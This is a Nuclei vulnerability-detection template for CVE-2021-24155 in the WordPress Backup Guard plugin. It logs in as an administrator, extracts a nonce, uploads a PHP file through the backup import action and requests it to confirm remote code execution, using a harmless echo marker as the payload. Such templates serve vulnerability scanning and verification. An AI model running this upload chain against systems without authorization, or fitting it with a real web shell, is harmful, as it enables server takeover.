nuclei-templates/cves/2021/CVE-2021-24155.yaml

78 lines
2.4 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: CVE-2021-24155
info:
name: Backup Guard < 1.6.0 - Authenticated Arbitrary File Upload
author: theamanrawat
severity: high
description: |
The WordPress Backup and Migrate Plugin Backup Guard WordPress plugin before 1.6.0 did not ensure that the imported files are of the SGBP format and extension, allowing high privilege users (admin+) to upload arbitrary files, including PHP ones, leading to RCE.
remediation: Fixed in version 1.6.0
reference:
- https://wpscan.com/vulnerability/d442acac-4394-45e4-b6bb-adf4a40960fb
- https://wordpress.org/plugins/backup/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24155
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2021-24155
cwe-id: CWE-434
metadata:
verified: "true"
tags: cve,cve2021,rce,wordpress,wp-plugin,wp,backup,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=backup_guard_backups HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=---------------------------204200867127808062083805313921
-----------------------------204200867127808062083805313921
Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.php"
Content-Type: application/x-php
<?php
echo "CVE-2021-24155";
?>
-----------------------------204200867127808062083805313921--
- |
GET /wp-content/uploads/backup-guard/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
req-condition: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains(all_headers_4, "text/html")
- status_code_4 == 200
- contains(body_3, '{\"success\":1}')
- contains(body_4, 'CVE-2021-24155')
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'BG_BACKUP_STRINGS = {"nonce":"([0-9a-zA-Z]+)"};'
internal: true